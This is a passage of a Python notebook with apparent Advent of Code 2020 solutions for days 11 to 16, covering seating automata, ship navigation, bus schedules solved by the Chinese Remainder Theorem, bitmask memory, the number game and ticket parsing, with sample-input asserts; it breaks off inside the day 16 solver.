# Day 11 a sample grid from the puzzle statement.
tests = """
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorld(tests) #, store_hashes=True)
cworld.find_stable()
seats_occ = cworld.repr().count('#')
log.info(f"test stable occupied-seats={seats_occ}")
# In[ ]:
ins = aoc.read_file_to_list('./in/day11.in')
ins = mapl(list, ins)
cworld = CellularWorld(ins)
cworld.find_stable()
seats_occ = cworld.repr().count('#')
log.info(f"Day 11 a solution: stable occupied-seats={seats_occ} after {cworld.iter_num} iterations")
# In[ ]:
print("Day 11 b")
class CellularWorldDirected(CellularWorld):
    """Day 11 b variant: 'neighbors' are the first seats visible along the
    8 rays, and an occupied seat empties at >= 5 visible (not 4)."""

    def iterate(self, steps=1):
        # Same double-buffered sweep as the parent, with part-b rules.
        for i in range(steps):
            world2 = copy.deepcopy(self.world)
            for y in range(self.dim[1]):
                for x in range(self.dim[0]):
                    val = self.world[y][x]
                    neighbors = self.get_seen_occuppied_seats(x, y)
                    if val == 'L' and neighbors == 0:
                        world2[y][x] = '#'
                    elif val == '#' and neighbors >= 5:
                        world2[y][x] = 'L'
            self.iter_num += 1
            self.set_world(world2)
            if self.store_hashes:
                self.world_hashes.append(self.get_hash())

    def get_seen_occuppied_seats(self, x, y):
        """Count occupied seats ('#') visible from (x, y) along the 8 rays;
        empty seats ('L') block the view."""
        directions = [
            [1,0], [-1,0], [0,1], [0,-1],
            [1,1], [-1,1], [1,-1], [-1,-1],
        ]
        seen = 0
        for d in directions:
            dx, dy = d # directions
            nx, ny = [x, y] # startpoint
            while(True): # loop handling one direction vector
                nx, ny = [nx+dx, ny+dy]
                if nx < 0 or ny < 0 or nx >= self.dim[0] or ny >= self.dim[1]:
                    break
                if "#" == self.world[ny][nx]:
                    seen += 1
                    break # in each direction, only 1 occupied can be seen
                elif "L" == self.world[ny][nx]:
                    break # empty seats block view
        return seen

    def find_cell(self, val):
        """Find first cell containing given value, return it's `[x, y]` coordinates.
        Returns None implicitly when the value is absent."""
        for y in range(self.dim[1]):
            for x in range(self.dim[0]):
                if self.world[y][x] == val:
                    return [x, y]
# In[ ]:
# Visibility sample: the single empty seat sees 8 occupied seats.
tests = """
.......#.
...#.....
.#.......
.........
..#L....#
....#....
.........
#........
...#.....
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
log.info(f"world repr:\n{cworld.repr()}")
c = cworld.find_cell('L')
n = cworld.get_seen_occuppied_seats(c[0], c[1])
log.info(f" empty spectator cell={c}, neib-#={n}")
assert( 8 == n )
# In[ ]:
# The leftmost empty seat sees no occupied seat (blocked by the other 'L').
tests = """
.............
.L.L.#.#.#.#.
.............
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
c = cworld.find_cell('L')
assert( 0 == cworld.get_seen_occuppied_seats(c[0], c[1]) )
# In[ ]:
# The central empty seat sees no occupied seat at all.
tests = """
.##.##.
#.#.#.#
##...##
...L...
##...##
#.#.#.#
.##.##.
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
c = cworld.find_cell('L')
assert( 0 == cworld.get_seen_occuppied_seats(c[0], c[1]) )
# In[ ]:
# Full part-b sample: must stabilize at 26 occupied seats.
tests = """
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
cworld.find_stable()
log.info(f"world stable after {cworld.iter_num} iters.") #": repr:\n{cworld.repr()}")
seats_occ = cworld.repr().count('#')
assert(26 == seats_occ)
log.info(f"test stable occupied-seats={seats_occ}")
# In[ ]:
cworld = CellularWorldDirected(ins)
cworld.find_stable()
log.info(f"world stable after {cworld.iter_num} iters.") #": repr:\n{cworld.repr()}")
seats_occ = cworld.repr().count('#')
log.info(f"Day 11 b solution: stable occupied-seats={seats_occ} after {cworld.iter_num} iters")
# ### Day 12: Rain Risks
# In[ ]:
# Compass order matters: turning right DEcreases the index (see move_ship).
directions = ['N', 'W', 'S', 'E']
direct_vecs = {'N': [0, 1], 'W': [-1, 0], 'S': [0, -1], 'E': [1, 0]}
def dist_manhattan(pos, pos_ref):
    """Manhattan (L1) distance between two [x, y] points."""
    dx = pos[0] - pos_ref[0]
    dy = pos[1] - pos_ref[1]
    return abs(dx) + abs(dy)
def move_ship(los):
    """Day 12 a: execute command strings ('N3', 'F10', 'R90', ...) moving the
    ship itself; return the Manhattan distance from the starting position."""
    ship_direct = 'E'
    ship_vec = direct_vecs[ship_direct]
    pos_ref = [0, 0]
    pos = pos_ref.copy()
    for cmd_str in los:
        cmd, val = [cmd_str[0], int(cmd_str[1:])]
        log.debug(f"cmd={[cmd, val]}")
        if cmd in directions:
            # translate without changing heading
            vec = direct_vecs[cmd]
            pos[0] += val * vec[0]
            pos[1] += val * vec[1]
            log.debug(f" new pos: {pos}")
        elif cmd == 'F':
            pos[0] += val * ship_vec[0]
            pos[1] += val * ship_vec[1]
            log.debug(f" new pos: {pos}; ship_direct={ship_direct}")
        elif cmd == 'R' or cmd == 'L':
            turns = val//90
            if cmd == 'R':
                # negative index deliberately wraps around the 4-entry directions list
                new_direct_idx = directions.index(ship_direct)-turns
            elif cmd == 'L':
                new_direct_idx = (directions.index(ship_direct)+turns) % len(directions)
            log.debug(f"cur_direct={ship_direct}:{directions.index(ship_direct)}, new_direct_idx={new_direct_idx}; cmd={cmd_str}; turns={turns}")
            ship_direct = directions[new_direct_idx]
            ship_vec = direct_vecs[ship_direct]
            log.debug(f" new ship_direct: {ship_direct}; from turn:{cmd}")
    return dist_manhattan(pos, pos_ref)
# In[ ]:
# Day 12 sample: expected Manhattan distance 25.
tests = """
F10
N3
F7
R90
F11
""".strip().split("\n")
assert( 25 == move_ship(tests) )
# In[ ]:
ins = aoc.read_file_to_list('./in/day12.in')
res = move_ship(ins)
log.info(f"Day 12 a solution: {res}")
# In[ ]:
print("Day 12 b")
def move_ship_by_waypoint(los):
    """Day 12 b: N/S/E/W commands move a waypoint relative to the ship;
    'F' moves the ship toward the waypoint `val` times; R/L rotate the
    waypoint around the ship in 90-degree steps.

    Returns the Manhattan distance from the starting position.
    Change vs. original: removed a duplicated, unreachable `elif` branch
    (the 'L180'/'R180' condition appeared twice in a row).
    """
    pos_ref = [0, 0]
    waypt_pos = [10, 1]  # waypoint starts 10 east, 1 north of the ship
    pos = pos_ref.copy()
    for cmd_str in los:
        cmd, val = [cmd_str[0], int(cmd_str[1:])]
        log.debug(f"cmd={[cmd, val]}")
        if cmd in directions:
            vec = direct_vecs[cmd]
            dpos = [val * vec[0], val * vec[1]]
            waypt_pos[0] += dpos[0]
            waypt_pos[1] += dpos[1]
            log.debug(f" new waypt-rpos: {waypt_pos}")
        elif cmd == 'F':
            dpos = [val * waypt_pos[0], val * waypt_pos[1]]
            pos[0] += dpos[0]
            pos[1] += dpos[1]
            log.debug(f" new pos: {pos}; waypt-rpos={waypt_pos}")
        elif cmd == 'R' or cmd == 'L': # rotate cartesian coordinates around origin in 90 degrees steps
            if cmd_str in ['R90', 'L270']: # rotate RIGHT
                cx, cy = waypt_pos
                waypt_pos = [cy, -cx]
            elif cmd_str in ['L90', 'R270']: # rotate LEFT
                cx, cy = waypt_pos
                waypt_pos = [-cy, cx]
            elif cmd_str in ['L180', 'R180']: # invert 180
                cx, cy = waypt_pos
                waypt_pos = [-cx, -cy]
            else:
                raise Exception(f"unknown cmd_str={cmd_str}")
            log.debug(f" new waypt-rpos={waypt_pos} from {[cx, cy]}")
    dist = dist_manhattan(pos, pos_ref)
    log.info(f"dist={dist}")
    return dist
# In[ ]:
assert( 286 == move_ship_by_waypoint(tests) )
# In[ ]:
log.setLevel( logging.INFO )
res = move_ship_by_waypoint(ins)
log.info(f"Day 12 b solution: {res}")
# ### Day 13: Shuttle search
# In[ ]:
# Day 13 sample: departure timestamp, then the bus-id list.
tests = """
939
7,13,x,x,59,x,31,19
""".strip().split("\n")
def find_shuttle(los):
    """Day 13 a: among the listed buses, find the one with the shortest wait
    after the start timestamp; return wait_time * bus_id.

    `los[0]` is the timestamp, `los[1]` the comma-separated bus ids ('x' = skip).
    """
    min_wait_tm, min_bus = [99_999_999, -1]  # sentinel "no bus found yet"
    start_tm = int(los[0])
    shuttles = los[1].split(',')
    log.info(f"[find_shuttle] {start_tm} {shuttles}")
    for bus in shuttles:
        if bus == 'x':
            continue
        bus = int(bus)
        remainder = start_tm % bus
        if remainder == 0:
            wait_tm = 0
        else:
            wait_tm = bus - remainder
        if wait_tm < min_wait_tm:
            min_wait_tm, min_bus = [wait_tm, bus]
            log.info(f"new_min: wait_tm={wait_tm}, 4bus={bus}, rmd={remainder}, res={wait_tm * bus}")
            if wait_tm == 0:
                # cannot do better than a zero wait
                break
        log.debug(f"wait_tm={wait_tm}, 4bus={bus}, rmd={remainder}, res={wait_tm * bus}")
    res = min_wait_tm * min_bus
    log.info(f"MIN: wait_tm={min_wait_tm}, 4bus={min_bus}, res={res}")
    return res
# In[ ]:
find_shuttle(tests)
# In[ ]:
ins = aoc.read_file_to_list('./in/day13.in')
find_shuttle(ins)
# In[ ]:
print("Day 13 b")
def find_shuttle_offsetted(s):
    """Semi-optimized brute-force algorithm implementation.

    Day 13 b: find the first timestamp t where every bus departs at
    t + its_position_offset.  Iterates in steps of the largest bus id and
    fast-rejects candidates via the 2nd- and 3rd-largest ids before testing
    the rest.
    """
    start_tm = int(time.time())
    log.info(f"[find_shuttle_offsetted] {s}")
    offsets = {}
    values = {}
    for idx, val in enumerate(s.split(',')):
        if val == 'x':
            continue
        val = int(val)
        values[idx] =val # by offset
        offsets[val] = idx # by value
    srtvalues = list(reversed(sorted(list(values.values()))))  # descending bus ids
    max_iterator = max(srtvalues)
    max_iterator_offset = offsets[max_iterator]
    log.info(f"max_it={max_iterator}->ofst={max_iterator_offset}; srtvalues={srtvalues}, offsets={offsets}, values={values}")
    #values_len = len(srtvalues)
    iterator2 = srtvalues[1]
    iterator2_offset = offsets[iterator2]
    iterator3 = srtvalues[2]
    iterator3_offset = offsets[iterator3]
    print_mod_interval = 100_000_000_000
    next_print_mod = print_mod_interval
    # candidate timestamps aligned so the largest bus fits its offset
    for t in map(lambda it: it * max_iterator -max_iterator_offset, range(1, 9_000_000_000_000_000//max_iterator)):
        if (t + iterator2_offset) % iterator2 != 0 or (t + iterator3_offset) % iterator3 != 0:
            continue # "FAST EXIT" this loop-item
        if t >= next_print_mod: #idx >= next_print_mod:
            log.info(f" calculating @{int(time.time())-start_tm:,}s ...: t#={t:,}")
            next_print_mod += print_mod_interval
        loop_ok = True
        for val in srtvalues[3:]:
            if (t + offsets[val]) % val != 0:
                loop_ok = False
                break
        if loop_ok:
            log.info(f"loop-OK for t#={t:,} @{int(time.time())-start_tm:,}s")
            return t
    raise Exception(f"No matching shuttle found after step t={t}")
# In[ ]:
# All sample cases from the day 13 b puzzle statement.
test = "7,13,x,x,59,x,31,19"
assert( 1068781 == find_shuttle_offsetted(test) )
# In[ ]:
test = "17,x,13,19"
assert( 3417 == find_shuttle_offsetted(test) )
# In[ ]:
test = "67,7,59,61"
assert( 754018 == find_shuttle_offsetted(test) )
# In[ ]:
test = "67,x,7,59,61"
assert( 779210 == find_shuttle_offsetted(test) )
# In[ ]:
test = "67,7,x,59,61"
assert( 1261476 == find_shuttle_offsetted(test) )
# In[ ]:
test = "1789,37,47,1889"
assert( 1202161486 == find_shuttle_offsetted(test) )
# In[ ]:
print(f"known: solution larger than {100000000000000:,} <= 100000000000000")
# In[ ]:
def find_shuttle_offsetted6(s):
    """Semi-optimized brute-force algorithm implementation.

    Same as find_shuttle_offsetted, but with SIX unrolled fast-reject
    divisor checks (for inputs with many buses).
    """
    start_tm = int(time.time())
    log.info(f"[find_shuttle_offsetted] {s}")
    offsets = {}
    values = {}
    for idx, val in enumerate(s.split(',')):
        if val == 'x':
            continue
        val = int(val)
        values[idx] = val # by offset
        offsets[val] = idx # by value
    srtvalues = list(reversed(sorted(list(values.values()))))  # descending bus ids
    iterator1 = max(srtvalues)
    iterator1_offset = offsets[iterator1]
    log.info(f"max_it={iterator1}->ofst={iterator1_offset}; srtvalues={srtvalues}, offsets={offsets}, values={values}")
    #values_len = len(srtvalues)
    iterator2 = srtvalues[1]
    iterator2_offset = offsets[iterator2]
    iterator3 = srtvalues[2]
    iterator3_offset = offsets[iterator3]
    iterator4 = srtvalues[3]
    iterator4_offset = offsets[iterator4]
    iterator5 = srtvalues[4]
    iterator5_offset = offsets[iterator5]
    iterator6 = srtvalues[5]
    iterator6_offset = offsets[iterator6]
    print_mod_interval = 100_000_000_000
    next_print_mod = print_mod_interval
    for idx in range(1, 9_000_000_000_000_000//iterator1):
        t = idx * iterator1 - iterator1_offset
        if (t + iterator2_offset) % iterator2 != 0:
            continue # "FAST EXIT" this loop-item
        elif (t + iterator3_offset) % iterator3 != 0:
            continue # "FAST EXIT" this loop-item
        elif (t + iterator4_offset) % iterator4 != 0:
            continue # "FAST EXIT" this loop-item
        elif (t + iterator5_offset) % iterator5 != 0:
            continue # "FAST EXIT" this loop-item
        elif (t + iterator6_offset) % iterator6 != 0:
            continue # "FAST EXIT" this loop-item
        else:
            if t >= next_print_mod: #idx >= next_print_mod:
                # NOTE(review): the Ts/s division below can ZeroDivisionError if
                # reached within the first second of the run
                log.info(f" calculating @{int(time.time())-start_tm:,}s ...: t#={t:,}; {t//(int(time.time())-start_tm):,} Ts/s")
                next_print_mod += print_mod_interval
            loop_ok = True
            for val in srtvalues[6:]:
                if (t + offsets[val]) % val != 0:
                    loop_ok = False
                    break
            if loop_ok:
                log.info(f"loop-OK for t#={t:,} @{int(time.time())-start_tm:,}s")
                return t
    raise Exception(f"No matching shuttle found after step t={t}")
# In[ ]:
# The brute-force day 13 b run is gated behind the resource-hog flag.
in13b = ins[1]
#EXEC_RESOURCE_HOGS = True
if EXEC_RESOURCE_HOGS:
    res = find_shuttle_offsetted6(in13b)
    print(f"Day 13 b solution={res}")
    # 2,448,348,017 Ts/s
    # 3,163,888,049 Ts/s explicit t calc
else:
    print("Omitting day 13 b resource expensive solution")
# In[ ]:
# Inspiration base: [- 2020 Day 13 Solutions - : adventofcode](https://www.reddit.com/r/adventofcode/comments/kc4njx/2020_day_13_solutions/)
# One solution: [adventofcode2020/main.py at master · r0f1/adventofcode2020](https://github.com/r0f1/adventofcode2020/blob/master/day13/main.py)
# Math Explanation: [Chinese Remainder Theorem | Brilliant Math & Science Wiki](https://brilliant.org/wiki/chinese-remainder-theorem/)
# a wonderful walk-through: [aoc/README.md at master · mebeim/aoc](https://github.com/mebeim/aoc/blob/master/2020/README.md#day-13---shuttle-search)
import numpy as np
#from math import prod # python 3.8 ?
def egcd(a, b):
    """Extended Euclid: return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)
def modinv(x, m):
    """Modular multiplicative inverse of x modulo m (requires gcd(x, m) == 1)."""
    g, inv, _ = egcd(x, m)
    assert g == 1, 'modular inverse does not exist'
    return inv % m
def pow38(g, w, p):
    """pow() stand-in for Python < 3.8: a negative exponent means the
    modular inverse (3.8+ builtin pow supports this natively)."""
    if w >= 0:
        return pow(g, w, p)
    return modinv(g, p)
# Re-solve day 13 directly: part a with numpy, part b via the CRT.
with open('./in/day13.in') as f:
    lines = [x.strip() for x in f]
arrival = int(lines[0])
buses = [(i, int(e)) for i, e in enumerate(lines[1].split(",")) if e.isdigit()]
times = [t for _, t in buses]
# NOTE(review): when arrival % e == 0 this gives a wait of e instead of 0
b = [e - (arrival % e) for e in times]
res = np.min(b) * times[np.argmin(b)]
print("Day 13 a solution:", res)
# Python-3.7 ERROR: pow() 2nd argument cannot be negative when 3rd argument specified
def crt(ns, bs):
    """Solve: Chinese Remainder "problem" using Chinese Remainder Theorem."""
    # Chinese Remainder Theorem
    # https://brilliant.org/wiki/chinese-remainder-theorem/
    N = np.prod(ns).item()
    x = sum(b * (N // n) * pow38(N // n, -1, n) for b, n in zip(bs, ns))
    return x % N
offsets = [time-idx for idx, time in buses]
res = crt(times, offsets)
print(f"Day 13 b solution: {res:,} <-- {res}")
# In[ ]:
# cool solution from user Rtchaik; this is my preferred!:
# at: [- 2020 Day 13 Solutions - : adventofcode](https://www.reddit.com/r/adventofcode/comments/kc4njx/2020_day_13_solutions/)
from itertools import count
def solve_day13_part2(buses):
    """Sieve-style search: lock in one bus at a time (largest first); once a
    bus matches, future candidates advance in multiples of all locked buses.

    `buses` maps bus_id -> offset (see prepare_buses).
    """
    log.info(f"[solve_day13_part2] {buses}")
    start_idx, steps = 0, 1
    log.info(f" initial startid={start_idx}, steps-delta={steps}")
    for bus, offset in sorted(buses.items(), reverse=True):
        for tstamp in count(start_idx, steps):
            if not (tstamp + offset) % bus:
                start_idx = tstamp
                steps *= bus
                log.info(f" new startid={start_idx}, steps-delta={steps}, tstamp={tstamp}")
                break
    log.info(f"found-OK: {tstamp}")
    return tstamp
def prepare_buses(s):
    """Map bus id -> its position offset in the comma list, skipping 'x' entries."""
    return {int(val): idx
            for idx, val in enumerate(s.split(','))
            if val != 'x'}
# In[ ]:
test = "1789,37,47,1889"
assert( 1202161486 == solve_day13_part2(prepare_buses(test)) )
# In[ ]:
#ins = aoc.read_file_to_list('./in/day13.in')
res = solve_day13_part2(prepare_buses(ins[1]))
log.info(f"Day 13 b solution: {res:,} <-- {res}")
# ### Day 14: Docking Data
# In[ ]:
def solve_day14_a(los):
    """Day 14 a: apply the current bitmask to every value written to memory;
    return the sum of all values left in memory."""
    log.info(f"[solve_day14_a] #-instructions={len(los)}")
    addrs = {}
    for line in los:
        if line.startswith('mask'):
            mask = line.split(' ')[-1]
            # '0'->X then all X->'0': only the mask's 1-bits survive => OR mask
            mask_or = mask.replace('0','X').replace('X','0')
            # '1'->X then all X->'1': the mask's 0-bits stay 0, rest become 1 => AND mask
            mask_and = mask.replace('1','X').replace('X','1')
            num_or = int(mask_or, 2)
            num_and = int(mask_and, 2)
            log.debug(f"mask={mask}")
            log.trace(f" mask_or ={mask_or }; num_or ={num_or}")
            log.trace(f" mask_and={mask_and}; num_and={num_and}")
        else:
            # extract the two integers from 'mem[addr] = val'
            addr, val = mapl(int, filterl(lambda it: it != '', re.split(r'[^\d]', line)))
            new_val = (val | num_or) & num_and
            addrs[addr] = new_val
            log.debug(f"instruct={[addr, val]} new_val={new_val}")
    res = sum(addrs.values())
    log.info(f"[solve_day14_a] value-sum={res} from num-addrs={len(addrs.keys())} addrs[#1-#3]={list(addrs.items())[0:3]}")
    return res
# In[ ]:
# Day 14 a sample from the puzzle statement (expected memory sum 165).
tests = """
mask = XXXXXXXXXXXXXXXXXXXXXXXXXXXXX1XXXX0X
mem[8] = 11
mem[7] = 101
mem[8] = 0
""".strip().split("\n")
#log.setLevel(logging.DEBUG)
solve_day14_a(tests)
# In[ ]:
log.setLevel(logging.INFO)
ins = aoc.read_file_to_list('./in/day14.in')
solve_day14_a(ins)
# In[ ]:
print("Day 14 b")
# In[ ]:
import itertools
# this function by reddit User semicolonator
# @ [adventofcode2020/main.py at master · r0f1/adventofcode2020](https://github.com/r0f1/adventofcode2020/blob/master/day14/main.py)
def get_possible_addrs(mask, addr):
    """Expand a day-14b floating mask applied to addr into all concrete addresses.

    Mask bit '0' keeps the address bit, '1' forces 1, 'X' floats (both values).
    """
    templ = "".join(v if m == "0" else m for m, v in zip(mask, f"{addr:036b}"))
    expanded = []
    for bits in itertools.product("01", repeat=templ.count("X")):
        bit_src = iter(bits)
        expanded.append(int("".join(next(bit_src) if ch == "X" else ch for ch in templ), 2))
    return expanded
# In[ ]:
def solve_day14_b(los):
    """Day 14 b: the mask floats over ADDRESSES, not values.

    Every write stores the unmasked value at all addresses produced by
    get_possible_addrs(); returns the sum of memory afterwards.
    """
    log.info(f"[solve_day14_b] #-instructions={len(los)}")
    addrs = {}
    for line in los:
        if line.startswith('mask'):
            mask = line.split(' ')[-1]
            mask_float = mask.replace('1','0')
            mask_or = mask.replace('X','0') #mask.replace('0','X').replace('X','0')
            num_or = int(mask_or, 2)
            log.debug(f"mask={mask}")
            log.trace(f" mask_float={mask_float}")
            log.trace(f" mask_or ={mask_or }; num_or ={num_or}")
        else:
            new_addrs = {}  # NOTE(review): unused
            addr, val = mapl(int, filterl(lambda it: it != '', re.split(r'[^\d]', line)))
            #new_val = (val | num_or) & num_and
            # NOP?: If the bitmask bit is 0, the corresponding memory address bit is unchanged.
            # OR!: If the bitmask bit is 1, the corresponding memory address bit is overwritten with 1.
            # NOTE(review): new_addr is only used for tracing; the expansion
            # below works from `mask` and the raw `addr` directly.
            new_addr = addr | num_or
            log.trace(f" addr={ addr:>8b} ; := { addr}")
            log.trace(f" new-addr={new_addr:>8b} ; := {new_addr}")
            for addr2 in get_possible_addrs(mask, addr):
                addrs[addr2] = val
    res = sum(addrs.values())
    log.info(f"[solve_day14_b] value-sum={res} from addrs-#={len(addrs.keys())} addrs[#1-#3]={list(addrs.items())[0:3]}")
    log.trace(f" {addrs}")
    return res
# In[ ]:
# Day 14 b sample from the puzzle statement (expected memory sum 208).
tests = """
mask = 000000000000000000000000000000X1001X
mem[42] = 100
mask = 00000000000000000000000000000000X0XX
mem[26] = 1
""".strip().split("\n")
#log.setLevel(aoc.LOGLEVEL_TRACE) # logging.DEBUG
log.setLevel(logging.INFO)
solve_day14_b(tests)
# In[ ]:
solve_day14_b(ins)
# ### Day 15: Rambunctious Recitation
# In[ ]:
def solve15a(l, steps=10):
    """Play the day-15 memory game for `steps` turns; return the last number spoken.

    `seen` maps number -> list of ALL 1-based turn indices it was spoken on
    (grows without bound — see solve15b for a memory-capped variant).
    """
    log.debug(f"[solve15a(l)] called with l={l}")
    seen = {}
    last_spoken = None
    # seed the game with the starting numbers
    for idx, n in enumerate(l):
        last_spoken = n
        if n in seen:
            seen[n].append(idx+1)
        else:
            seen[n] = [idx+1]
        log.debug(f"idx#{idx+1}, n={n}, * seen[n]={seen[n]}")
    # after the seeding loop idx == len(l)-1, so this runs turns len(l)+1 .. steps
    for idx in range(idx+2, steps+len(l)-idx):
        if len(seen[last_spoken])==1:
            n = 0  # spoken for the first time -> say 0
        else:
            n = seen[last_spoken][-1] - seen[last_spoken][-2]  # age since previous mention
        if n in seen:
            seen[n].append(idx)
        else:
            seen[n] = [idx]
        log.trace(f" new n={n}; seen={seen}")
        log.debug(f"idx#{idx}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
        last_spoken = n
    log.info(f"[solve15a] idx#{idx}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
    return n
# In[ ]:
# Day 15 part a: worked example "0,3,6" for 10 turns.
tests = "0,3,6"
#log.setLevel(aoc.LOGLEVEL_TRACE)
#log.setLevel(logging.DEBUG)
log.setLevel(logging.INFO)
res = solve15a(mapl(int, tests.split(',')), steps=10)
# 0*, 3*, 6*, 0, 3, 3, 1, 0, 4, 0
log.info(f"testing result={res}")  # BUGFIX: previously logged the literal 0 instead of res
# In[ ]:
# Part-a examples from the puzzle statement, all played to turn 2020.
res = solve15a([1, 3, 2], steps=2020)
assert( 1 == res )
res = solve15a([2, 1, 3], steps=2020)
assert( 10 == res )
res = solve15a([1, 2, 3], steps=2020)
assert( 27 == res )
res = solve15a([2, 3, 1], steps=2020)
assert( 78 == res )
res = solve15a([3, 2, 1], steps=2020)
assert( 438 == res )
res = solve15a([3, 1, 2], steps=2020)
assert( 1836 == res )
# In[ ]:
# Real input: day 15 part a.
ins = aoc.read_file_to_str('./in/day15.in').strip().split(',')
ins = mapl(int, ins)
res = solve15a(ins, steps=2020)
#log.setLevel(logging.DEBUG)
log.info(f"Day 15 a solution: {res} from {ins}")
# In[ ]:
def solve15b(l, steps=10):
    """Day 15 part b: same game as solve15a, optimized for 30M turns.

    Optimizations vs. solve15a: per-number history is truncated to the last
    two occurrences, and a parallel seen_lens dict avoids repeated len() calls.
    Returns the number spoken on the final turn.
    """
    log.info(f"[solve15b(l)] called with list-len={len(l)}, steps={steps:,}")
    seen = {}          # number -> [second-to-last turn, last turn] (or just [last turn])
    last_spoken = None
    # warm-up: speak the starting numbers (turns 1..len(l))
    for idx, n in enumerate(l):
        last_spoken = n
        if n in seen:
            #seen[n].append(idx+1)
            seen[n] = [seen[n][-1], idx+1]  # keep only the last two occurrences
        else:
            seen[n] = [idx+1]
        #log.debug(f"idx#{idx+1}, n={n}, * seen[n]={seen[n]}")
    # cache occurrence counts (1 or 2) to skip len() in the hot loop
    seen_lens = {}
    for n in seen:
        seen_lens[n] = len(seen[n])
    # same range trick as solve15a: runs turns len(l)+1 .. steps inclusive
    for idx in range(idx+2, steps+len(l)-idx):
        if idx % 10_000_000 == 0 and idx < steps:
            log.info(f" calculating, @ idx={idx:,}")
        if seen_lens[last_spoken] == 1: #len(seen[last_spoken]) == 1:
            n = 0
        else:
            n = seen[last_spoken][-1] - seen[last_spoken][-2]
        if n in seen:
            #seen[n].append(idx)
            seen[n] = [seen[n][-1], idx]
            seen_lens[n] = 2
        else:
            seen[n] = [idx]
            seen_lens[n] = 1
        #log.debug(f"idx#{idx}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
        last_spoken = n
    log.info(f"[solve15b] idx#{idx:,}, n={n}, last_spoken={last_spoken}, seen-len={len(seen)}")
    return n
# In[ ]:
# Part a solutions still valid with the optimized implementation!
res = solve15b([1, 3, 2], steps=2020)
assert( 1 == res )
res = solve15b([2, 1, 3], steps=2020)
assert( 10 == res )
res = solve15b([1, 2, 3], steps=2020)
assert( 27 == res )
res = solve15b([2, 3, 1], steps=2020)
assert( 78 == res )
res = solve15b([3, 2, 1], steps=2020)
assert( 438 == res )
res = solve15b([3, 1, 2], steps=2020)
assert( 1836 == res )
# In[ ]:
#nsteps = 30000000
nsteps = 30_000_000
def run15b(l, steps, cond):
    """Run solve15b for `steps` turns and optionally assert the result.

    l:     starting numbers
    steps: number of turns to simulate
    cond:  expected result to assert against, or None to skip the check;
           cond-bearing (test) runs are skipped unless EXEC_RESOURCE_HOGS
    """
    if cond is not None and not EXEC_RESOURCE_HOGS:
        # omit resource intensive tests
        return
    start_tm = int(time.time())
    # BUGFIX: previously called solve15b(l, steps=nsteps), silently ignoring
    # the `steps` parameter in favor of the module-level global.
    res = solve15b(l, steps=steps)
    if cond is not None:
        assert( cond == res )
    took_tm = int(time.time()) - start_tm
    log.info(f"result={res} took {took_tm}s")
# In[ ]:
# Day 15 part b: the 30-million-turn examples, then the real input.
# Given 0,3,6, the 30000000th number spoken is 175594.
run15b([0, 3, 6], nsteps, 175594)
# In[ ]:
# Given 1,3,2, the 30000000th number spoken is 2578.
run15b([1, 3, 2], nsteps, 2578)
# In[ ]:
# Given 2,1,3, the 30000000th number spoken is 3544142.
run15b([2, 1, 3], nsteps, 3544142)
# In[ ]:
# Given 1,2,3, the 30000000th number spoken is 261214.
run15b([1, 2, 3], nsteps, 261214)
# In[ ]:
# Given 2,3,1, the 30000000th number spoken is 6895259.
run15b([2, 3, 1], nsteps, 6895259)
# In[ ]:
# Given 3,2,1, the 30000000th number spoken is 18.
run15b([3, 2, 1], nsteps, 18)
# In[ ]:
# Given 3,1,2, the 30000000th number spoken is 362.
run15b([3, 1, 2], nsteps, 362)
# In[ ]:
if EXEC_RESOURCE_HOGS:
    log.info("Day 15 b solution:")
    run15b(ins, nsteps, None)
else:
    log.info("Day 15 b solution: [[already solved]] - omitting")
### Day 16: Ticket Translation
# In[ ]:
# Day 16 example input: field ranges, own ticket, nearby tickets.
tests = """
class: 1-3 or 5-7
row: 6-11 or 33-44
seat: 13-40 or 45-50
your ticket:
7,1,14
nearby tickets:
7,3,47
40,4,50
55,2,20
38,6,12
""".strip()
def parse_day16_input(s):
    """Parse day-16 input into a dict with 'fields', 'my_ticket', 'other_tickets'.

    fields:        {field_name: [[lo1, hi1], [lo2, hi2]]} inclusive ranges
    my_ticket:     list of ints (empty if no 'your ticket:' section present)
    other_tickets: list of lists of ints
    """
    los = s.split("\n")
    md = 'fields'  # current parsing mode/section
    # BUGFIX: was `myticket = []` (typo) — `my_ticket` stayed unbound and the
    # final return raised NameError whenever the 'your ticket:' section was missing.
    my_ticket = []
    other_tickets = []
    fields = {}
    for line in los:
        if line == '':
            continue
        if line == 'your ticket:':
            md = 'my_ticket'
            continue
        elif line == 'nearby tickets:':
            md = 'other_tickets'
            continue
        if md == 'fields':
            fld, vals = line.split(':')
            # e.g. ' 1-3 or 5-7' -> [[1, 3], [5, 7]]
            avals = [it.strip() for it in vals.split(' or ')]
            for idx, aval in enumerate(avals):
                avals[idx] = [int(v) for v in aval.split('-')]
            fields[fld] = avals
        elif md == 'my_ticket' or md == 'other_tickets':
            this_ticket = [int(v) for v in line.split(',')]
            if md == 'my_ticket':
                my_ticket = this_ticket
            else:
                other_tickets.append(this_ticket)
    return {'fields':fields, 'my_ticket':my_ticket, 'other_tickets':other_tickets}
def solve16a(ticket_info):
    """Day 16 part a: ticket scanning error rate.

    Sums every value on the nearby tickets that is not valid for ANY field.
    """
    #log.info(f"ticket_info={ticket_info}")
    # Collect all valid numbers into a set: O(1) membership tests below.
    # (Previously a sorted list, giving an O(n) scan per checked value.)
    valid_nums = set()
    for field in ticket_info['fields'].keys():
        for entry in ticket_info['fields'][field]:
            lo, hi = entry  # renamed from min/max to avoid shadowing builtins
